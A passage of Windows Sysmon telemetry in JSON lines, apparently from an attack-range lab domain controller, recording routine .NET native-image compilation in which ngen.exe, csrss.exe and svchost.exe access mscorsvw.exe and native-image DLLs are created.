C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8233,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:18.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-0010FDD30E00}\r\nTargetProcessId: 5016\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:18.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-0010FDD30E00}","TargetProcessId":"5016","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8234,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:21.272\r\nProcessGuid: {41C8662E-22B6-5F25-0000-00101FC91000}\r\nProcessId: 5016\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1398-0\\System.Workflow.ComponentModel.dll\r\nCreationUtcTime: 2020-08-01 08:07:21.272","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:21.272","ProcessGuid":"{41C8662E-22B6-5F25-0000-00101FC91000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1398-0\\System.Workflow.ComponentModel.dll","CreationUtcTime":"2020-08-01 08:07:21.272","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8235,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.365\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22B9-5F25-0000-0010C0CE1000}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.365","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22B9-5F25-0000-0010C0CE1000}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8236,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.365\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22B9-5F25-0000-0010C0CE1000}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.365","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22B9-5F25-0000-0010C0CE1000}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.381\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22B9-5F25-0000-0010C0CE1000}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.381","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22B9-5F25-0000-0010C0CE1000}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.459\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.459","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.459\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.459","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:21.459\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-0010D4390F00}\r\nTargetProcessId: 4384\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:21.459","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-0010D4390F00}","TargetProcessId":"4384","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:23.131\r\nProcessGuid: {41C8662E-22B9-5F25-0000-001020D31000}\r\nProcessId: 4384\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1120-0\\System.Workflow.Runtime.dll\r\nCreationUtcTime: 2020-08-01 08:07:23.131","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:23.131","ProcessGuid":"{41C8662E-22B9-5F25-0000-001020D31000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1120-0\\System.Workflow.Runtime.dll","CreationUtcTime":"2020-08-01 08:07:23.131","EventReceivedTime":"2020-08-01 08:07:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
